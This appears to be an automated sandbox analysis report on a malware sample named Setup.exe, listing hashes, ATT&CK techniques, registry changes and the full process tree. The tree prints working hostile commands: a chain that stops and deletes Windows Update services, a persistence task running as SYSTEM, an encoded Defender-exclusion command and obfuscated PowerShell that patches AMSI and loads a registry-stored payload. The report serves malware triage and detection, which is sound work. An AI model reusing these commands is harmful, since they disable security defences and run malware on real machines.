d4394564000ca31d1d78e78322c3c7bd6287bd0d700b02916cc889ddc2bf22d4

General

Target

Setup.exe
Size

3.3MB
MD5

89253fded8cd7633cd774b34ec00d7ae
SHA1

36579483553c0f703604f439d9b5b46f088ab543
SHA256

d4394564000ca31d1d78e78322c3c7bd6287bd0d700b02916cc889ddc2bf22d4
SHA512

c79bb7809db89a10d65b268816336f3d952277ec55d65e1e21e6ff2a690c3767fdde08586daa3d4f77ee6d2d85d35aa8d870389ffcf7fb2888de5d16362e616f

Score

10^/10

discovery evasion exploit trojan

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Executes dropped EXE 2 IoCs

Processes:

update.exeiexplore.exe

pid process

2632 update.exe
1832 iexplore.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1508 takeown.exe
2640 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2632	update.exe
1832	iexplore.exe

pid	process
1508	takeown.exe
2640	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

iexplore.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	iexplore.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1508 takeown.exe
2640 icacls.exe
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

iexplore.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 ip-api.com

pid	process
1508	takeown.exe
2640	icacls.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe

flow	ioc
12	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

Processes:

update.exeiexplore.exe

description	pid	process	target process
PID 2632 set thread context of 1636	2632	update.exe	AppLaunch.exe
PID 1832 set thread context of 4088	1832	iexplore.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1052 2632 WerFault.exe update.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4640 schtasks.exe

pid	pid_target	process	target process
1052	2632	WerFault.exe	update.exe

pid	process
4640	schtasks.exe

Modifies data under HKEY_USERS 34 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Modifies registry key 1 TTPs 8 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

3380 reg.exe
3412 reg.exe
2540 reg.exe
3152 reg.exe
1400 reg.exe
2044 reg.exe
3260 reg.exe
4336 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeiexplore.exepowershell.EXE

pid process

4016 powershell.exe
4016 powershell.exe
1832 iexplore.exe
3340 powershell.EXE

pid	process
3380	reg.exe
3412	reg.exe
2540	reg.exe
3152	reg.exe
1400	reg.exe
2044	reg.exe
3260	reg.exe
4336	reg.exe

pid	process
4016	powershell.exe
4016	powershell.exe
1832	iexplore.exe
3340	powershell.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeAppLaunch.exeiexplore.exetakeown.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	1636	AppLaunch.exe
Token: SeDebugPrivilege	1832	iexplore.exe
Token: SeTakeOwnershipPrivilege	1508	takeown.exe
Token: SeDebugPrivilege	3340	powershell.EXE

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

Setup.exeupdate.exeiexplore.execmd.execmd.execmd.exe

description	pid	process	target process
PID 552 wrote to memory of 2632	552	Setup.exe	update.exe
PID 552 wrote to memory of 2632	552	Setup.exe	update.exe
PID 552 wrote to memory of 2632	552	Setup.exe	update.exe
PID 552 wrote to memory of 1832	552	Setup.exe	iexplore.exe
PID 552 wrote to memory of 1832	552	Setup.exe	iexplore.exe
PID 2632 wrote to memory of 1636	2632	update.exe	AppLaunch.exe
PID 2632 wrote to memory of 1636	2632	update.exe	AppLaunch.exe
PID 2632 wrote to memory of 1636	2632	update.exe	AppLaunch.exe
PID 2632 wrote to memory of 1636	2632	update.exe	AppLaunch.exe
PID 2632 wrote to memory of 1636	2632	update.exe	AppLaunch.exe
PID 1832 wrote to memory of 4536	1832	iexplore.exe	cmd.exe
PID 1832 wrote to memory of 4536	1832	iexplore.exe	cmd.exe
PID 4536 wrote to memory of 4016	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 4016	4536	cmd.exe	powershell.exe
PID 1832 wrote to memory of 4744	1832	iexplore.exe	cmd.exe
PID 1832 wrote to memory of 4744	1832	iexplore.exe	cmd.exe
PID 4744 wrote to memory of 1376	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 1376	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 4784	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 4784	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 4904	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 4904	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 2264	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 2264	4744	cmd.exe	sc.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 4088	1832	iexplore.exe	conhost.exe
PID 4744 wrote to memory of 3500	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 3500	4744	cmd.exe	sc.exe
PID 4744 wrote to memory of 2540	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 2540	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 3152	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 3152	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 1400	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 1400	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 2044	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 2044	4744	cmd.exe	reg.exe
PID 1832 wrote to memory of 2544	1832	iexplore.exe	cmd.exe
PID 1832 wrote to memory of 2544	1832	iexplore.exe	cmd.exe
PID 4744 wrote to memory of 3260	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 3260	4744	cmd.exe	reg.exe
PID 4744 wrote to memory of 1508	4744	cmd.exe	takeown.exe
PID 4744 wrote to memory of 1508	4744	cmd.exe	takeown.exe
PID 2544 wrote to memory of 4640	2544	cmd.exe	schtasks.exe
PID 2544 wrote to memory of 4640	2544	cmd.exe	schtasks.exe
PID 4744 wrote to memory of 2640	4744	cmd.exe	icacls.exe
PID 4744 wrote to memory of 2640	4744	cmd.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:552

C:\Users\Admin\AppData\Local\Temp\update.exe
C:\Users\Admin\AppData\Local\Temp\update.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 348
3⤵
- Program crash
PID:1052

C:\Users\Admin\AppData\Local\Temp\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
2⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:1376

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:4784

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:4904

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:2264

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:3500

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2540

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:3152

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1400

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:2044

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:3260

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2640

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4336

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3380

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3412

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:4088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
4⤵
- Creates scheduled task(s)
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2632 -ip 2632
1⤵
PID:2372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rgVLhzRGqmCB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ECMixJQqOVZAYy,[Parameter(Position=1)][Type]$SOUsTYUfhX)$JNSMBFcgWiK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JNSMBFcgWiK.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ECMixJQqOVZAYy).SetImplementationFlags('Runtime,Managed');$JNSMBFcgWiK.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$SOUsTYUfhX,$ECMixJQqOVZAYy).SetImplementationFlags('Runtime,Managed');Write-Output $JNSMBFcgWiK.CreateType();}$WNnRkZkaCFbya=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$lmFPZuOVUnpnxd=$WNnRkZkaCFbya.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HoblDAfjqupcAyIgVmk=rgVLhzRGqmCB @([String])([IntPtr]);$uQpJaYCpPYcOOgSELwPfXa=rgVLhzRGqmCB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VYajwTVhRRc=$WNnRkZkaCFbya.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$bjeWeVTFwFmPER=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$VYajwTVhRRc,[Object]('Load'+'LibraryA')));$ThmqsWVTNazpYrtwI=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$VYajwTVhRRc,[Object]('Vir'+'tual'+'Pro'+'tect')));$UARpbQm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bjeWeVTFwFmPER,$HoblDAfjqupcAyIgVmk).Invoke('a'+'m'+'si.dll');$ipeeFeutKsHpBztGa=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$UARpbQm,[Object]('Ams'+'iSc'+'an'+'Buffer')));$sJCLtfKMXt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ThmqsWVTNazpYrtwI,$uQpJaYCpPYcOOgSELwPfXa).Invoke($ipeeFeutKsHpBztGa,[uint32]8,4,[ref]$sJCLtfKMXt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ipeeFeutKsHpBztGa,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ThmqsWVTNazpYrtwI,$uQpJaYCpPYcOOgSELwPfXa).Invoke($ipeeFeutKsHpBztGa,[uint32]8,0x20,[ref]$sJCLtfKMXt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
1⤵
PID:4760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oAbeXmWcqHzj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PtEfDoPYGAPRqY,[Parameter(Position=1)][Type]$PgCIKxkVGh)$ELVmOlQVBOA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ELVmOlQVBOA.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$PtEfDoPYGAPRqY).SetImplementationFlags('Runtime,Managed');$ELVmOlQVBOA.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$PgCIKxkVGh,$PtEfDoPYGAPRqY).SetImplementationFlags('Runtime,Managed');Write-Output $ELVmOlQVBOA.CreateType();}$TIqaDAIzKvAsB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$bDbtXLuARLhuDi=$TIqaDAIzKvAsB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KNlolZMthrbtZWpnJHq=oAbeXmWcqHzj @([String])([IntPtr]);$fjDAjQZEVRYAsOlHRjnGmi=oAbeXmWcqHzj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KjcmTfepfPy=$TIqaDAIzKvAsB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$SlCEpGRzIncMAf=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$KjcmTfepfPy,[Object]('Load'+'LibraryA')));$LSpmQLTuaHEKDWJRW=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$KjcmTfepfPy,[Object]('Vir'+'tual'+'Pro'+'tect')));$sirsngP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SlCEpGRzIncMAf,$KNlolZMthrbtZWpnJHq).Invoke('a'+'m'+'si.dll');$NjJpnnpvCtRsxGcuP=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$sirsngP,[Object]('Ams'+'iSc'+'an'+'Buffer')));$JRrhPiawcD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LSpmQLTuaHEKDWJRW,$fjDAjQZEVRYAsOlHRjnGmi).Invoke($NjJpnnpvCtRsxGcuP,[uint32]8,4,[ref]$JRrhPiawcD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NjJpnnpvCtRsxGcuP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LSpmQLTuaHEKDWJRW,$fjDAjQZEVRYAsOlHRjnGmi).Invoke($NjJpnnpvCtRsxGcuP,[uint32]8,0x20,[ref]$JRrhPiawcD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3005ff32-a7da-499f-b11b-cefd049e4e92}
1⤵
PID:1980

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
2.3MB

MD5
ed73affd7b0ec16ed1f1207f19ba9d77

SHA1
1f4f3f70f3c2b2db3c543ae31f243cb18ae85095

SHA256
1f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e

SHA512
1399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642

Download Submit
C:\Users\Admin\AppData\Local\Temp\update.exe
Filesize
1.9MB

MD5
6c08423aa3ca9067cc5583dc28f329fa

SHA1
20017a7855f2c082c6e6ce3223729123ce604879

SHA256
b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f

SHA512
eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0

Download Submit
